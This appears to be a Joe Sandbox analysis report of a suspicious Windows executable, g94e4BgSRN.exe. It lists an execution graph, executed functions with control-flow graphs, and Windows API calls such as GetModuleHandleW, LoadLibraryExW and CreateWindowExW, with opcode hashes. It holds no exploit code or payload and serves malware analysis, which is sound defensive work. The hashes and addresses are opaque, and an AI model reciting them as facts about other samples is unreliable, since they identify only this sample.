                                                          Analysis Process: g94e4BgSRN.exe PID: 6384 Parent PID: 6140 g94e4BgSRN.exeCOMMON

                                                          Execution Graph

                                                          Execution Coverage:10.3%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:223
                                                          Total number of Limit Nodes:20

                                                          Graph

                                                          execution_graph 20410 b640d0 20411 b640e2 20410->20411 20412 b640ee 20411->20412 20416 b641e8 20411->20416 20421 b63898 20412->20421 20414 b64119 20417 b641ed 20416->20417 20425 b642e8 20417->20425 20429 b642d8 20417->20429 20422 b638a3 20421->20422 20437 b65b00 20422->20437 20424 b67000 20424->20414 20426 b6430f 20425->20426 20427 b643ec 20426->20427 20433 b63e20 20426->20433 20431 b6430f 20429->20431 20430 b643ec 20430->20430 20431->20430 20432 b63e20 CreateActCtxA 20431->20432 20432->20430 20434 b65378 CreateActCtxA 20433->20434 20436 b6543b 20434->20436 20438 b65b0b 20437->20438 20441 b65b20 20438->20441 20440 b670cd 20440->20424 20442 b65b2b 20441->20442 20445 b65b50 20442->20445 20444 b671a2 20444->20440 20446 b65b5b 20445->20446 20449 b66d3c 20446->20449 20448 b672a2 20448->20444 20450 b66d47 20449->20450 20452 b679be 20450->20452 20457 b69bb8 20450->20457 20461 b69ba8 20450->20461 20451 b679fc 20451->20448 20452->20451 20465 b6bce0 20452->20465 20471 b6bcd0 20452->20471 20477 b69cb0 20457->20477 20486 b69c9f 20457->20486 20458 b69bc7 20458->20452 20462 b69bc7 20461->20462 20463 b69cb0 3 API calls 20461->20463 20464 b69c9f 3 API calls 20461->20464 20462->20452 20463->20462 20464->20462 20466 b6bd01 20465->20466 20467 b6bd25 20466->20467 20513 b6be90 20466->20513 20517 b6be4d 20466->20517 20522 b6be80 20466->20522 20467->20451 20472 b6bd01 20471->20472 20473 b6bd25 20472->20473 20474 b6be90 6 API calls 20472->20474 20475 b6be80 6 API calls 20472->20475 20476 b6be4d 6 API calls 20472->20476 20473->20451 20474->20473 20475->20473 20476->20473 20495 b69684 20477->20495 20480 b69cdb 20480->20458 20481 b69cd3 20481->20480 20482 b69ed8 GetModuleHandleW 20481->20482 20483 b69f05 20482->20483 20483->20458 20487 b69cc3 20486->20487 20488 b69684 GetModuleHandleW 20486->20488 20490 b69cdb 20487->20490 20493 b69f38 2 API calls 20487->20493 20494 b69f29 2 API calls 20487->20494 20488->20487 20489 b69cd3 20489->20490 20491 b69ed8 GetModuleHandleW 20489->20491 20490->20458 20492 b69f05 20491->20492 20492->20458 20493->20489 20494->20489 20496 b69e90 GetModuleHandleW 20495->20496 20498 b69cc3 20496->20498 20498->20480 20499 b69f38 20498->20499 20504 b69f29 20498->20504 20500 b69684 GetModuleHandleW 20499->20500 20501 b69f4c 20500->20501 20502 b69f71 20501->20502 20509 b696e8 20501->20509 20502->20481 20505 b69684 GetModuleHandleW 20504->20505 20506 b69f4c 20504->20506 20505->20506 20507 b69f71 20506->20507 20508 b696e8 LoadLibraryExW 20506->20508 20507->20481 20508->20507 20510 b6a118 LoadLibraryExW 20509->20510 20512 b6a191 20510->20512 20512->20502 20514 b6be9d 20513->20514 20515 b6bed7 20514->20515 20526 b6b734 20514->20526 20515->20467 20518 b6be63 20517->20518 20519 b6beab 20517->20519 20518->20467 20520 b6bed7 20519->20520 20521 b6b734 6 API calls 20519->20521 20520->20467 20521->20520 20523 b6be9d 20522->20523 20524 b6bed7 20523->20524 20525 b6b734 6 API calls 20523->20525 20524->20467 20525->20524 20527 b6b73f 20526->20527 20529 b6c7c8 20527->20529 20530 b6b81c 20527->20530 20529->20529 20531 b6b827 20530->20531 20532 b6c837 20531->20532 20533 b66d3c 6 API calls 20531->20533 20534 b6c845 20532->20534 20547 b6cc90 20532->20547 20551 b6ccb8 20532->20551 20533->20532 20555 b6b82c 20534->20555 20536 b6c85f 20560 b6b83c 20536->20560 20538 b6c866 20564 b6e442 20538->20564 20578 b6e5b0 20538->20578 20588 b6e5c8 20538->20588 20597 b6e67a 20538->20597 20602 b6cbd8 20538->20602 20539 b6c870 20539->20529 20548 b6cc95 20547->20548 20549 b6b83c GetModuleHandleW LoadLibraryExW GetModuleHandleW CreateWindowExW CreateWindowExW 20548->20549 20550 b6cd27 20548->20550 20549->20550 20552 b6cce6 20551->20552 20553 b6b83c GetModuleHandleW LoadLibraryExW GetModuleHandleW CreateWindowExW CreateWindowExW 20552->20553 20554 b6cd27 20552->20554 20553->20554 20558 b6b837 20555->20558 20556 b6cab4 GetModuleHandleW LoadLibraryExW GetModuleHandleW CreateWindowExW CreateWindowExW 20557 b6dddc 20556->20557 20557->20536 20558->20556 20559 b6dde1 20558->20559 20559->20536 20561 b6b847 20560->20561 20562 b6cbd8 GetModuleHandleW LoadLibraryExW GetModuleHandleW CreateWindowExW CreateWindowExW 20561->20562 20563 b6e3f7 20562->20563 20563->20538 20565 b6e405 20564->20565 20569 b6e44b 20564->20569 20565->20539 20566 b6e5a0 20566->20539 20567 b6e569 20568 b6e67a GetModuleHandleW CreateWindowExW CreateWindowExW 20567->20568 20571 b6e5c3 20567->20571 20568->20567 20569->20566 20569->20567 20570 b6cbd8 GetModuleHandleW LoadLibraryExW GetModuleHandleW CreateWindowExW CreateWindowExW 20569->20570 20570->20569 20573 b6e605 20571->20573 20576 b6ea37 GetModuleHandleW LoadLibraryExW GetModuleHandleW 20571->20576 20577 b6ea48 GetModuleHandleW LoadLibraryExW GetModuleHandleW 20571->20577 20572 b6e645 20574 b6f406 GetModuleHandleW CreateWindowExW CreateWindowExW 20572->20574 20575 b6f410 GetModuleHandleW CreateWindowExW CreateWindowExW 20572->20575 20573->20539 20574->20573 20575->20573 20576->20572 20577->20572 20580 b6e579 20578->20580 20579 b6e67a GetModuleHandleW CreateWindowExW CreateWindowExW 20579->20580 20580->20578 20580->20579 20582 b6e5c3 20580->20582 20581 b6e605 20581->20539 20582->20581 20586 b6ea37 GetModuleHandleW LoadLibraryExW GetModuleHandleW 20582->20586 20587 b6ea48 GetModuleHandleW LoadLibraryExW GetModuleHandleW 20582->20587 20583 b6e645 20584 b6f406 GetModuleHandleW CreateWindowExW CreateWindowExW 20583->20584 20585 b6f410 GetModuleHandleW CreateWindowExW CreateWindowExW 20583->20585 20584->20581 20585->20581 20586->20583 20587->20583 20590 b6e5f9 20588->20590 20592 b6e6ea 20588->20592 20589 b6e605 20589->20539 20590->20589 20595 b6ea37 GetModuleHandleW LoadLibraryExW GetModuleHandleW 20590->20595 20596 b6ea48 GetModuleHandleW LoadLibraryExW GetModuleHandleW 20590->20596 20591 b6e645 20593 b6f406 GetModuleHandleW CreateWindowExW CreateWindowExW 20591->20593 20594 b6f410 GetModuleHandleW CreateWindowExW CreateWindowExW 20591->20594 20592->20539 20593->20592 20594->20592 20595->20591 20596->20591 20598 b6e650 20597->20598 20600 b6f406 GetModuleHandleW CreateWindowExW CreateWindowExW 20598->20600 20601 b6f410 GetModuleHandleW CreateWindowExW CreateWindowExW 20598->20601 20599 b6e6ea 20599->20539 20600->20599 20601->20599 20606 b6cbe3 20602->20606 20603 b6e5a0 20603->20539 20604 b6e569 20605 b6e67a GetModuleHandleW CreateWindowExW CreateWindowExW 20604->20605 20608 b6e5c3 20604->20608 20605->20604 20606->20603 20606->20604 20607 b6cbd8 GetModuleHandleW LoadLibraryExW GetModuleHandleW CreateWindowExW CreateWindowExW 20606->20607 20607->20606 20610 b6e605 20608->20610 20613 b6ea37 GetModuleHandleW LoadLibraryExW GetModuleHandleW 20608->20613 20614 b6ea48 GetModuleHandleW LoadLibraryExW GetModuleHandleW 20608->20614 20609 b6e645 20611 b6f406 GetModuleHandleW CreateWindowExW CreateWindowExW 20609->20611 20612 b6f410 GetModuleHandleW CreateWindowExW CreateWindowExW 20609->20612 20610->20539 20611->20610 20612->20610 20613->20609 20614->20609 20615 55f0a18 SetWindowLongW 20616 55f0a84 20615->20616 20617 b0d09c 20618 b0d0b4 20617->20618 20619 b0d10e 20618->20619 20622 55f0988 20618->20622 20626 55f1688 20618->20626 20623 55f09ae 20622->20623 20625 55f1688 2 API calls 20623->20625 20624 55f09cf 20624->20619 20625->20624 20627 55f16b5 20626->20627 20628 55f16e7 20627->20628 20630 55f1810 20627->20630 20632 55f1824 20630->20632 20631 55f18b0 20631->20628 20634 55f18c8 20632->20634 20635 55f18d9 20634->20635 20637 55f2d60 20634->20637 20635->20631 20641 55f2d90 20637->20641 20645 55f2d81 20637->20645 20638 55f2d7a 20638->20635 20642 55f2dd2 20641->20642 20644 55f2dd9 20641->20644 20643 55f2e2a CallWindowProcW 20642->20643 20642->20644 20643->20644 20644->20638 20646 55f2dd2 20645->20646 20648 55f2dd9 20645->20648 20647 55f2e2a CallWindowProcW 20646->20647 20646->20648 20647->20648 20648->20638 20649 b6bfa8 20650 b6c00e 20649->20650 20654 b6c168 20650->20654 20657 b6c158 20650->20657 20651 b6c0bd 20660 b6b7bc 20654->20660 20658 b6c196 20657->20658 20659 b6b7bc DuplicateHandle 20657->20659 20658->20651 20659->20658 20661 b6c1d0 DuplicateHandle 20660->20661 20662 b6c196 20661->20662 20662->20651 20663 55f80c0 20664 55f80ed 20663->20664 20667 55f7a08 20664->20667 20666 55f8181 20668 55f7a13 20667->20668 20671 55f7d40 20668->20671 20670 55fc2ee 20670->20666 20672 55f7d4b 20671->20672 20676 b65b50 6 API calls 20672->20676 20677 b671f0 20672->20677 20681 b672d0 20672->20681 20673 55fc4dc 20673->20670 20676->20673 20678 b67230 20677->20678 20679 b66d3c 6 API calls 20678->20679 20680 b672a2 20679->20680 20680->20673 20682 b67290 20681->20682 20683 b672df 20681->20683 20684 b66d3c 6 API calls 20682->20684 20683->20673 20685 b672a2 20684->20685 20685->20673

                                                          Executed Functions

                                                          Function 00B69CB0, Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1639 b69cb0-b69cc5 call b69684 1642 b69cc7 1639->1642 1643 b69cdb-b69cdf 1639->1643 1692 b69ccd call b69f38 1642->1692 1693 b69ccd call b69f29 1642->1693 1644 b69cf3-b69d34 1643->1644 1645 b69ce1-b69ceb 1643->1645 1650 b69d36-b69d3e 1644->1650 1651 b69d41-b69d4f 1644->1651 1645->1644 1646 b69cd3-b69cd5 1646->1643 1648 b69e10-b69ed0 1646->1648 1687 b69ed2-b69ed5 1648->1687 1688 b69ed8-b69f03 GetModuleHandleW 1648->1688 1650->1651 1653 b69d73-b69d75 1651->1653 1654 b69d51-b69d56 1651->1654 1657 b69d78-b69d7f 1653->1657 1655 b69d61 1654->1655 1656 b69d58-b69d5f call b69690 1654->1656 1660 b69d63-b69d71 1655->1660 1656->1660 1661 b69d81-b69d89 1657->1661 1662 b69d8c-b69d93 1657->1662 1660->1657 1661->1662 1664 b69d95-b69d9d 1662->1664 1665 b69da0-b69da9 call b696a0 1662->1665 1664->1665 1669 b69db6-b69dbb 1665->1669 1670 b69dab-b69db3 1665->1670 1672 b69dbd-b69dc4 1669->1672 1673 b69dd9-b69de6 1669->1673 1670->1669 1672->1673 1674 b69dc6-b69dd6 call b696b0 call b696c0 1672->1674 1680 b69de8-b69e06 1673->1680 1681 b69e09-b69e0f 1673->1681 1674->1673 1680->1681 1687->1688 1689 b69f05-b69f0b 1688->1689 1690 b69f0c-b69f20 1688->1690 1689->1690 1692->1646 1693->1646
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286193243.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 65520abc8c3dbe3a749963d95e90058d059f038280f77f70d4f5ee990fde0cfb
                                                          • Instruction ID: 6ca2badef67e42369edb2d1fa78a195a0ce2469c243e2c427c33e56d64304176
                                                          • Opcode Fuzzy Hash: 65520abc8c3dbe3a749963d95e90058d059f038280f77f70d4f5ee990fde0cfb
                                                          • Instruction Fuzzy Hash: 62713570A00B058FDB24DF6AD54479ABBF9FF88304F00896AD44AD7A50DB39E849CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055F07C4, Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1694 55f07c4-55f0836 1695 55f0838-55f083e 1694->1695 1696 55f0841-55f0848 1694->1696 1695->1696 1697 55f084a-55f0850 1696->1697 1698 55f0853-55f08f2 CreateWindowExW 1696->1698 1697->1698 1700 55f08fb-55f0933 1698->1700 1701 55f08f4-55f08fa 1698->1701 1705 55f0935-55f0938 1700->1705 1706 55f0940 1700->1706 1701->1700 1705->1706 1707 55f0941 1706->1707 1707->1707
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 055F08E2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.288744892.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_55f0000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: 662600f86597b8c4615131267a3af1749b5dd79daa7d446b12a51e1ed6c2968f
                                                          • Instruction ID: a462b454b939f8421ed69602478ef2f9ac6cb9e4d507383d8d47976c1abf7f8d
                                                          • Opcode Fuzzy Hash: 662600f86597b8c4615131267a3af1749b5dd79daa7d446b12a51e1ed6c2968f
                                                          • Instruction Fuzzy Hash: 1D51E0B1D103099FDF14CF99C984ADEBBB5FF48310F24812AE919AB250D770A945CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055F07D0, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1708 55f07d0-55f0836 1709 55f0838-55f083e 1708->1709 1710 55f0841-55f0848 1708->1710 1709->1710 1711 55f084a-55f0850 1710->1711 1712 55f0853-55f08f2 CreateWindowExW 1710->1712 1711->1712 1714 55f08fb-55f0933 1712->1714 1715 55f08f4-55f08fa 1712->1715 1719 55f0935-55f0938 1714->1719 1720 55f0940 1714->1720 1715->1714 1719->1720 1721 55f0941 1720->1721 1721->1721
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 055F08E2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.288744892.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_55f0000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: e5287749aee98331985fecc58f9896af9e7cb3d3b035edf3f51fef035b5b89f4
                                                          • Instruction ID: e78ee353c2fba66b6b21d68878a3d8846bff62feeb28562e9bd4b8b366d7fe6d
                                                          • Opcode Fuzzy Hash: e5287749aee98331985fecc58f9896af9e7cb3d3b035edf3f51fef035b5b89f4
                                                          • Instruction Fuzzy Hash: 1141C0B1D103099FDF14CFA9C984ADEBBB5BF48314F24812AE919AB250D7749845CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B6536D, Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1722 b6536d-b65376 1723 b65378-b65439 CreateActCtxA 1722->1723 1725 b65442-b6549c 1723->1725 1726 b6543b-b65441 1723->1726 1733 b6549e-b654a1 1725->1733 1734 b654ab-b654af 1725->1734 1726->1725 1733->1734 1735 b654c0 1734->1735 1736 b654b1-b654bd 1734->1736 1738 b654c1 1735->1738 1736->1735 1738->1738
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 00B65429
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286193243.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: f8ff0d85504e1e3d36a23cb150bd7ce86f3ccba9dcc5a5400b3954aee8740e51
                                                          • Instruction ID: a2a812304fcd68bf86074c5700593f0e6b5bbbef046e46489a9cbda3e0552a6b
                                                          • Opcode Fuzzy Hash: f8ff0d85504e1e3d36a23cb150bd7ce86f3ccba9dcc5a5400b3954aee8740e51
                                                          • Instruction Fuzzy Hash: 24412271C00619CBDB24CFA9C8847CEBBF5BF88308F2084A9D409AB251DB756946CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B63E20, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1739 b63e20-b65439 CreateActCtxA 1742 b65442-b6549c 1739->1742 1743 b6543b-b65441 1739->1743 1750 b6549e-b654a1 1742->1750 1751 b654ab-b654af 1742->1751 1743->1742 1750->1751 1752 b654c0 1751->1752 1753 b654b1-b654bd 1751->1753 1755 b654c1 1752->1755 1753->1752 1755->1755
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 00B65429
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286193243.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: c512f23a5e73ae7debbd27a6ddb289bad743f0a32797d552bcb03e1eb5f1029d
                                                          • Instruction ID: 5396a31d7192290822f6d9d9d016d555d4689cd633c772477098a11db7bf058c
                                                          • Opcode Fuzzy Hash: c512f23a5e73ae7debbd27a6ddb289bad743f0a32797d552bcb03e1eb5f1029d
                                                          • Instruction Fuzzy Hash: 75410171C0061DCBDB24CFA9C8887DEBBB5FF48308F2084A9D409AB255DB756986CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055F2D90, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1756 55f2d90-55f2dcc 1757 55f2e7c-55f2e9c 1756->1757 1758 55f2dd2-55f2dd7 1756->1758 1764 55f2e9f-55f2eac 1757->1764 1759 55f2e2a-55f2e62 CallWindowProcW 1758->1759 1760 55f2dd9-55f2e10 1758->1760 1762 55f2e6b-55f2e7a 1759->1762 1763 55f2e64-55f2e6a 1759->1763 1767 55f2e19-55f2e28 1760->1767 1768 55f2e12-55f2e18 1760->1768 1762->1764 1763->1762 1767->1764 1768->1767
                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 055F2E51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.288744892.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_55f0000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0
                                                          • Opcode ID: 5c1293f957231eb28461ba62c718e7b65d4cfc3d4821d2d7fa9c45e5cf0490c8
                                                          • Instruction ID: af78ac4bf69c56b50e2a9e94c6c31172970017d1e96e217f6992bd10b2261fbc
                                                          • Opcode Fuzzy Hash: 5c1293f957231eb28461ba62c718e7b65d4cfc3d4821d2d7fa9c45e5cf0490c8
                                                          • Instruction Fuzzy Hash: 60414CB8900705DFDB14CF99C888AAABBF5FF88314F24C459D619AB361D734A845CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B6B7BC, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1770 b6b7bc-b6c264 DuplicateHandle 1772 b6c266-b6c26c 1770->1772 1773 b6c26d-b6c28a 1770->1773 1772->1773
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B6C196,?,?,?,?,?), ref: 00B6C257
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286193243.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 5594f4b322f72dd294ddeaf2144d3cdbe59c77855ebadfffd0f1b923ab5f5b76
                                                          • Instruction ID: 8b0edff57226f7e9bca7fa42e2d0dc659c06eddce3ca4526cf94e8dd15d9ae41
                                                          • Opcode Fuzzy Hash: 5594f4b322f72dd294ddeaf2144d3cdbe59c77855ebadfffd0f1b923ab5f5b76
                                                          • Instruction Fuzzy Hash: 4421E5B5900208AFDB10CF99D984AEEBBF8EB48314F14845AE955B7350D378A954CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B6C1C8, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1776 b6c1c8-b6c264 DuplicateHandle 1777 b6c266-b6c26c 1776->1777 1778 b6c26d-b6c28a 1776->1778 1777->1778
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B6C196,?,?,?,?,?), ref: 00B6C257
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286193243.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: c1eb756c2cffedd8bf62966653ffa3db88fa7512bd5ccd4171a5365b22b88ce0
                                                          • Instruction ID: e819815d6b3f039e40cf902c2d8bdb52f02ae28833c715b3fd2ce8c988fc4d1e
                                                          • Opcode Fuzzy Hash: c1eb756c2cffedd8bf62966653ffa3db88fa7512bd5ccd4171a5365b22b88ce0
                                                          • Instruction Fuzzy Hash: 4E2105B59002089FDB00CF99D984ADEBFF9EB48310F14841AE918A7350C378A945CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B696E8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1781 b696e8-b6a158 1783 b6a160-b6a18f LoadLibraryExW 1781->1783 1784 b6a15a-b6a15d 1781->1784 1785 b6a191-b6a197 1783->1785 1786 b6a198-b6a1b5 1783->1786 1784->1783 1785->1786
                                                          APIs
                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B69F71,00000800,00000000,00000000), ref: 00B6A182
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286193243.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 768034b57849c8ba2d58b410f9551d33498f317e2db007aa3cf415ae3174c27a
                                                          • Instruction ID: 114743474dc4d80f55dac72347200a2223d2914fab6759219c5d3bfc34532198
                                                          • Opcode Fuzzy Hash: 768034b57849c8ba2d58b410f9551d33498f317e2db007aa3cf415ae3174c27a
                                                          • Instruction Fuzzy Hash: 441103B69002089FDB10CF9AC848ADEFBF8EB49314F14846AD919B7210C779A945CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B6A111, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1789 b6a111-b6a158 1790 b6a160-b6a18f LoadLibraryExW 1789->1790 1791 b6a15a-b6a15d 1789->1791 1792 b6a191-b6a197 1790->1792 1793 b6a198-b6a1b5 1790->1793 1791->1790 1792->1793
                                                          APIs
                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B69F71,00000800,00000000,00000000), ref: 00B6A182
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286193243.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 92b74e6af3b3797a7058b64b34fefd80548fe44c0c23fce0a354b34579b77edf
                                                          • Instruction ID: f5e19de9841b58f7eb09c106bf701e8926a55057110f6395d7d7fab860cad572
                                                          • Opcode Fuzzy Hash: 92b74e6af3b3797a7058b64b34fefd80548fe44c0c23fce0a354b34579b77edf
                                                          • Instruction Fuzzy Hash: EB1114B6D002089FDB10CF9AD844BDEFBF8EB99314F14842AD919B7210C779A945CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B69684, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1796 b69684-b69ed0 1798 b69ed2-b69ed5 1796->1798 1799 b69ed8-b69f03 GetModuleHandleW 1796->1799 1798->1799 1800 b69f05-b69f0b 1799->1800 1801 b69f0c-b69f20 1799->1801 1800->1801
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,00B69CC3), ref: 00B69EF6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286193243.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: bb729b1ec97ff90f27532113e19d915620ecc8e07b37336d978a6464ffb2e855
                                                          • Instruction ID: 7d0d0c3e64e3519b24ea4dfc668dd103bd82e9046223ed4df496d7c0856737ed
                                                          • Opcode Fuzzy Hash: bb729b1ec97ff90f27532113e19d915620ecc8e07b37336d978a6464ffb2e855
                                                          • Instruction Fuzzy Hash: 2E11F3B6D006498BDB10CF9AC844BDEBBF8EB49314F14846AD819B7610C379A549CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055F0A18, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1803 55f0a18-55f0a82 SetWindowLongW 1804 55f0a8b-55f0a9f 1803->1804 1805 55f0a84-55f0a8a 1803->1805 1805->1804
                                                          APIs
                                                          • SetWindowLongW.USER32(?,?,?), ref: 055F0A75
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.288744892.00000000055F0000.00000040.00000001.sdmp, Offset: 055F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_55f0000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID: LongWindow
                                                          • String ID:
                                                          • API String ID: 1378638983-0
                                                          • Opcode ID: fb5b95055b4c6b9810861ebf47107bffdcd39f4d08f85a28c85674e208caff0d
                                                          • Instruction ID: 2f0212dd4b45942a8ccbf5ed5a848a23f4a179b283eed0494ea9943f9056c321
                                                          • Opcode Fuzzy Hash: fb5b95055b4c6b9810861ebf47107bffdcd39f4d08f85a28c85674e208caff0d
                                                          • Instruction Fuzzy Hash: C01100B58002089FDB10CF99C988BEEBBF8FB48324F14841AD955A3750C374A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B0D061, Relevance: .1, Instructions: 79COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286137706.0000000000B0D000.00000040.00000001.sdmp, Offset: 00B0D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b0d000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0ac1b5565beb09a7e71f549c6c88f35ca7be6d1a8fe34b36811aeaed9e3cd55b
                                                          • Instruction ID: 1216c853d1f888202d51ef205066bae34becc223263f9b634514a4009de66892
